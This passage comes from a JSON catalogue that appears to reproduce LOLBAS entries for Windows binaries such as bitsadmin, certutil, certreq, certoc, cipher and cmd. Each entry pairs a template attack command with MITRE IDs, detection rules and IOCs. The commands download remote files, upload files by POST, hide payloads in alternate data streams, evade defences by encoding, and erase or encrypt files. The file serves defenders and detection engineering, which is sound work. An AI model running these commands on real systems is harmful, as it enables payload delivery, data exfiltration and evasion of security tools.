stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:bitsadmin-exe:3","toolId":"lolbas:bitsadmin-exe","toolName":"Bitsadmin.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"bitsadmin /create 1 & bitsadmin /addfile 1 c:\\windows\\system32\\cmd.exe c:\\data\\playfolder\\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\\data\\playfolder\\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset","description":"One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job.","usecase":"Execute binary file specified. Can be used as a defensive evasion.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\bitsadmin.exe","C:\\Windows\\SysWOW64\\bitsadmin.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/bitsadmin_download_file.yml"},{"type":"IOC","value":"Child process from bitsadmin.exe"},{"type":"IOC","value":"bitsadmin creates new files"},{"type":"IOC","value":"bitsadmin adds data to alternate data stream"}],"references":["https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679","https://www.youtube.com/watch?v=_8xJaaQlpBo","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://www.soc-labs.top/en/detections/100","https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/"]},{"id":"lolbas:certoc-exe:0","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"certoc.exe -LoadDLL {PATH_ABSOLUTE:.dll}","description":"Loads the target DLL file","usecase":"Execute code within DLL file","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"]},{"id":"lolbas:certoc-exe:1","toolId":"lolbas:certoc-exe","toolName":"CertOC.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certoc.exe -GetCACAPS {REMOTEURL:.ps1}","description":"Downloads text formatted files","usecase":"Download scripts, webshells etc.","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\certoc.exe","c:\\windows\\syswow64\\certoc.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml"},{"type":"IOC","value":"Process creation with given parameter"},{"type":"IOC","value":"Unsigned DLL load via certoc.exe"},{"type":"IOC","value":"Network connection via certoc.exe"}],"references":["https://twitter.com/sblmsrsn/status/1445758411803480072?s=20","https://twitter.com/sblmsrsn/status/1452941226198671363?s=20","https://lolbas-project.github.io/lolbas/Binaries/CertOC/"]},{"id":"lolbas:certreq-exe:0","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE} {PATH:.txt}","description":"Send the specified file (penultimate argument) to the specified URL via HTTP POST and save the response to the specified txt file (last argument).","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"]},{"id":"lolbas:certreq-exe:1","toolId":"lolbas:certreq-exe","toolName":"CertReq.exe","name":"Upload","source":"LOLBAS","platform":["Windows"],"capability":["File Upload"],"nativeCategory":["Upload"],"command":"CertReq -Post -config {REMOTEURL} {PATH_ABSOLUTE}","description":"Send the specified file (last argument) to the specified URL via HTTP POST and show response in terminal.","usecase":"Upload","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certreq.exe","C:\\Windows\\SysWOW64\\certreq.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml"},{"type":"IOC","value":"certreq creates new files"},{"type":"IOC","value":"certreq makes POST requests"}],"references":["https://dtm.uk/certreq","https://lolbas-project.github.io/lolbas/Binaries/CertReq/"]},{"id":"lolbas:certutil-exe:0","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:1","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}","description":"Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>` when not.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:2","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt","description":"Download and save a .ps1 file to an Alternate Data Stream (ADS).","usecase":"Download file from Internet and save it in an NTFS Alternate Data Stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:3","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"certutil.exe -URL {REMOTEURL:.exe}","description":"Download and save an executable to `%LOCALAPPDATA%low\\Microsoft\\CryptnetUrlCache\\Content\\<hash>`.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:4","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Encode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Encode"],"command":"certutil -encode {PATH} {PATH:.base64}","description":"Command to encode a file using Base64","usecase":"Encode files to evade defensive measures","mitre":["T1027.013"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:5","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decode {PATH:.base64} {PATH}","description":"Command to decode a Base64 encoded file.","usecase":"Decode files to evade defensive measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:certutil-exe:6","toolId":"lolbas:certutil-exe","toolName":"Certutil.exe","name":"Decode","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Decode"],"command":"certutil -decodehex {PATH:.hex} {PATH}","description":"Command to decode a hexadecimal-encoded file.","usecase":"Decode files to evade defensive measures","mitre":["T1140"],"privilege":"user","fullPath":["C:\\Windows\\System32\\certutil.exe","C:\\Windows\\SysWOW64\\certutil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_encode.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certutil_decode.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/4a11ef9514938e7a7e32cf5f379e975cebf5aed3/rules/windows/defense_evasion_suspicious_certutil_commands.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/command_and_control_certutil_network_connection.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_urlcache_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_download_with_verifyctl_and_split_arguments.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/certutil_with_decode_argument.yml"},{"type":"IOC","value":"Certutil.exe creating new files on disk"},{"type":"IOC","value":"Useragent Microsoft-CryptoAPI/10.0"},{"type":"IOC","value":"Useragent CertUtil URL Agent"}],"references":["https://twitter.com/Moriarty_Meng/status/984380793383370752","https://twitter.com/mattifestation/status/620107926288515072","https://twitter.com/egre55/status/1087685529016193025","https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin/","https://lolbas-project.github.io/lolbas/Binaries/Certutil/"]},{"id":"lolbas:change-exe:0","toolId":"lolbas:change-exe","toolName":"Change.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"change.exe user","description":"Once executed, `change.exe` will execute `chgusr.exe` in the same folder. Thus, if `change.exe` is copied to a folder and an arbitrary executable is renamed to `chgusr.exe`, `change.exe` will spawn it. Instead of `user`, it is also possible to use `port` or `logon` as command-line option.","usecase":"Execute an arbitrary executable via trusted system executable.","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\change.exe","c:\\windows\\syswow64\\change.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"change.exe being executed and executes a child process outside of its normal path of c:\\windows\\system32\\ or c:\\windows\\syswow64\\"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Change/"]},{"id":"lolbas:cipher-exe:0","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher /w:{PATH_ABSOLUTE:folder}","description":"Zero out a file","usecase":"Can be used to forensically erase a file.","mitre":["T1485"],"privilege":"user","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"]},{"id":"lolbas:cipher-exe:1","toolId":"lolbas:cipher-exe","toolName":"Cipher.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"cipher.exe /e {PATH_ABSOLUTE}","description":"Encrypt a file","usecase":"Can be used to impair defences by e.g. encrypting a critical EDR solution file.","mitre":["T1562"],"privilege":"admin","fullPath":["c:\\windows\\system32\\cipher.exe","c:\\windows\\syswow64\\cipher.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml"},{"type":"IOC","value":"cipher.exe process with /w on the command line"}],"references":["https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/","https://lolbas-project.github.io/lolbas/Binaries/Cipher/"]},{"id":"lolbas:cmd-exe:0","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:{REMOTEURL:.sct} ^scrobj.dll > {PATH}:payload.bat","description":"Add content to an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmd-exe:1","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"cmd.exe - < {PATH}:payload.bat","description":"Execute payload.bat stored in an Alternate Data Stream (ADS).","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1059.003"],"privilege":"user","fullPath":["C:\\Windows\\System32\\cmd.exe","C:\\Windows\\SysWOW64\\cmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_ads_file_creation.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml"},{"type":"IOC","value":"cmd.exe executing files from alternate data streams."},{"type":"IOC","value":"cmd.exe creating/modifying file contents in an alternate data stream."}],"references":["https://twitter.com/yeyint_mth/status/1143824979139579904","https://twitter.com/Mr_0rng/status/1601408154780446721","https://medium.com/@mr-0range/a-new-lolbin-using-the-windows-type-command-to-upload-download-files-81d7b6179e22","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/type","https://lolbas-project.github.io/lolbas/Binaries/Cmd/"]},{"id":"lolbas:cmd-exe:2","toolId":"lolbas:cmd-exe","toolName":"Cmd.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"type {PATH_SMB} > {PATH_ABSOLUTE}","description":"Downloads a specified file from a WebDAV server to the target file.","usecase":"Download/copy a file from a WebDAV 